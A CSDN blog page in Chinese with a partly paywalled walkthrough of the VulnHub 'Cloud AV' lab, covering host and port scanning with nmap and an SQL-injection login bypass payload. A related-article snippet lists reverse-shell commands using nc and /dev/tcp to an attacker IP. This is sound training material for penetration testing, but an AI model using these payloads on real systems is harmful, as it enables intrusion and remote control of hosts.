渗透测试流程模拟02

最新推荐文章于 2024-08-11 12:17:09 发布
最新推荐文章于 2024-08-11 12:17:09 发布
阅读量414 收藏
点赞数
分类专栏: 渗透测试流程思路完整模拟
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCR_123/article/details/119702868
版权
本文详细介绍了渗透测试的过程,从信息收集开始,通过nmap进行主机和端口扫描,发现8080端口的Werkzeug httpd服务。接着利用SQL注入绕过身份验证,接着利用命令执行漏洞尝试反弹shell,但由于版本不一致导致-e选项无效。然后通过文件传输和SQLite数据库获取可能的密码信息,尝试SSH提权未果。最后,发现一个SUID权限的程序并利用其进行提权,成功获取root权限。
摘要由CSDN通过智能技术生成

靶场下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
推荐工具:virtualbox

信息收集

主机发现nmap 192.168.56.0/24 二层主机发现 for i in $(seq 1 254); do sudo arping -c 2 192.168.56.$i; done

端口扫描nmap -p- 192.168.56.104
在这里插入图片描述

服务扫描nmap -p22,8080 -sV 192.168.56.104
在这里插入图片描述

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)

访问服务

SSH为远程连接,无用户名密码信息,暂时搁置
因此访问http服务8080端口,页面如下,需要一个邀请码进行身份验证
方法:
1、通过sql注入代码,绕过身份验证
2、暴力破解
kali密码字典文件默认放在/usr/share/wordlists下
在这里插入图片描述

sql注入

首先尝试该表单处是否存在sql注入
1、bp尝试闭合字符,填写表单抓包,尝试注入所有的字符,服务器在代码执行过程中触发语法语义上的错误
在这里插入图片描述

当注入双引号是存在报错回显
在这里插入图片描述

源代码:if len(c.execute(‘select * from code where password="’ + password + ‘"’).fetchall()) > 0:单引号内的语句代表语句本身,可去掉
构造payload:select * from code where password=" + " or 1=1-- + "
绕过身份验证,进入文

最低0.47元/天 解锁文章
时间胶囊vdd
关注
专栏目录
关于VMware虚拟机上Openssh broken问题的解决
Gun&rose
07-17 1746
之前在Manjaro Linux的虚机环境下执行ssh远程访问失败的问题的解决 Problem ssh -v cc@10.101.3.100 OpenSSH_8.0p1, OpenSSL 1.1.1c 28 May 2019 debug1: Reading configuration data /home/sj/.ssh/config debug1: Reading configuratio...
40余个超好用的在线影视站点
热门推荐
Hern(宋兆恒)
01-01 25万+
综合影视 低端电影:http://ddrk.me/ 1090影视:https://1090ys.com 碟影世界:http://www.952780.com/ 播王:https://bowan.su/ 吾爱看电影:http://www.5aikp.com/ 魔力电影网:https://magbt.net/ 胖子视频:http://www.pangzitv.com/ 白鹿影院:htt...
【VulnHub靶场】——BOREDHACKERBLOG: CLOUD AV
Demo不是emo的博客
11-05 5768
从上周开始制定了为期24周的打靶训练(每周一次),所以今天开始进行24次系统性打靶第二次训练,每次打靶后都会分享靶场攻略和总结的知识点
渗透练习02
最新发布
weixin_48135968的博客
08-11 601
由于靶场是目标靶机的docker搭建的,所有我们进入的shell是docker容器,当前容器ip为127.17.0.3 (docker相当于虚拟机),该ip是内网IP。为了进一步获取更多信息,看该网段有哪些ip存活,这些存活ip有没有漏洞,用ping太慢,只能一个个测,linux系统没有fping,所有需使用fscan等工具。显而易见,此处确实是docker容器系统,不是安装在普通服务器上的系统,我们进入的shell不是靶机的物理机shell。
废物的靶场日记 hackthebox-Timing
m0_53302733的博客
03-26 1312
废物的靶场日记 hackthebox-Timing 今天做medium难度的Timing 靶机IP 10.10.11.135 前渗透 nmap -sV -A 10.10.11.135 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 看一下80端口是一个登录框 看不出什么 wfuzz+dirs
BOREDHACKERBLOG: CLOUD AV
weixin_46591320的博客
11-20 828
CLOUD AV打靶记录
渗透测试流程图.zip
04-06
渗透测试是一种安全评估方法,通过模拟黑客攻击行为来检测网络和系统的脆弱性。这份"渗透测试流程图.zip"文件包含了详细的渗透测试过程,主要目的是帮助IT专业人士和安全工程师理解并实施这一过程。其中的"渗透测试...
渗透测试,靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
渗透测试标准流程图[诸葛建伟].pdf
08-13
"渗透测试标准流程图" 本文档旨在描述渗透测试的标准流程图,涵盖了渗透测试的整个生命周期,从初始阶段到报告阶段。该流程图旨在帮助渗透测试人员和组织更好地理解和实施渗透测试,以便更好地保护信息系统和资产。...
渗透测试流程.zip
04-06
渗透测试是网络安全领域中至关重要的一个环节,它模拟黑客攻击行为来评估系统和网络的安全性。在这个"渗透测试流程.zip"文件中,我们主要聚焦于渗透测试工程师面试中可能遇到的问题和相关知识点。以下是关于渗透测试...
VCC、VDD、VEE、VSS的区别
05-17
VCC、VDD、VEE、VSS的区别 PCB设计时需要注意的地方
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1258
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 1034
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhub靶机随笔-BOREDHACKERBLOG: CLOUD AV
weixin_59005129的博客
04-08 1510
我的命令: ./update_cloudav "3 |nc 192.168.3.44 7777 |/bin/bash |nc 192.168.3.44 9999”我用的命令: cat | echo 'bash -i >& /dev/tcp/192.168.3.44/4444 0>&1'|bash。命令: cat | echo 'bash -i >& /dev/tcp/攻击机IP/攻击机开放port 0>&1'|bash。2.别放弃,继续挨个翻目录文件,在/home/scanner下有几个特殊文件。
metasploit - HP Data Protector Remote Command Execution
Nixawk
09-05 2425
53641 (1) - HP Data Protector Remote CommandExecution Synopsis The remoteservice allows remote execution of arbitrary commands withoutauthentication. Description The remote HPData Protector client
Vikings -Vulnhub
wcl20010的博客
05-09 768
靶机下载地址:Vikings: 1 ~ VulnHub 1.主机发现 arp-scan -l 2.端口扫描 nmap -p 1-65535 -A 192.168.56.108 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
红日安全ATT&CK靶机实战系列之vulnstack7
黑白的博客
04-30 1万+
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 边下载着,可以开始vmware的网络配置 这次和前面不太一样了 有三个网段,所以需要我们把网络这块拿捏的死死的 DMZ区 桥接模式(这个IP段不固定,我是31段的) IP段为192.168.31.1/24 第二层网络环境 NAT模式 IP段为192.168.52.1/24 第三层网络环境 仅主机模块 IP段为192.1
企业渗透测试:风险规避与流程详解
渗透测试不仅仅是模拟外部黑客的入侵,也包括对内部威胁的防范,因此它可以涵盖黑盒、灰盒甚至白盒测试的不同范畴。测试人员可能会获得一些关于系统的信息,以便更全面地评估安全状况。技术层面,渗透测试通常涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值